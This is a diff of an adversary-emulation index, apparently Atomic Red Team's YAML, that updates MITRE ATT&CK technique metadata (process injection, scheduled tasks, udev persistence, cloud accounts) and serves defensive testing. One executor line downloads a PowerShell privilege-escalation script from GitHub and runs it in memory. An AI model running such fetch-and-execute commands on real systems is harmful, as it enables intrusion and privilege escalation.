         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -40609,6 +40839,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -40623,16 +40856,47 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests:
     - name: Process injection ListPlanting
@@ -40672,7 +40936,7 @@ privilege-escalation:
         elevation_required: true
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -40717,9 +40981,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -40776,8 +41039,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -40786,7 +41049,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -40828,7 +41090,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -40853,7 +41115,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests:
     - name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -40897,7 +41158,7 @@ privilege-escalation:
         elevation_required: true
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -40937,8 +41198,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -40946,13 +41209,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -40983,17 +41246,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -41056,7 +41316,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -41090,8 +41350,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -41100,6 +41360,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -41112,7 +41376,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -41230,7 +41493,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests:
     - name: Process Injection via mavinject.exe
@@ -41279,6 +41541,65 @@ privilege-escalation:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
         name: powershell
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -41314,7 +41635,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -41338,7 +41659,6 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests:
     - name: Netsh Helper DLL Registration
@@ -41378,7 +41698,7 @@ privilege-escalation:
         elevation_required: true
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -41462,11 +41782,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -41518,9 +41837,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -41647,7 +41965,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -41685,8 +42003,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -41822,23 +42138,24 @@ privilege-escalation:
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -41885,7 +42202,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -41917,8 +42234,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -41932,6 +42249,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -41944,11 +42265,14 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -42327,7 +42651,7 @@ execution:
           schtasks /Delete /TN "#{task_name}" /F
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -42393,7 +42717,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests:
     - name: WMI Reconnaissance Users
@@ -42704,7 +43027,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests:
     - name: ESXi - Install a custom VIB on an ESXi host
@@ -42771,61 +43093,7 @@ execution:
         elevation_required: false
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -42838,26 +43106,78 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
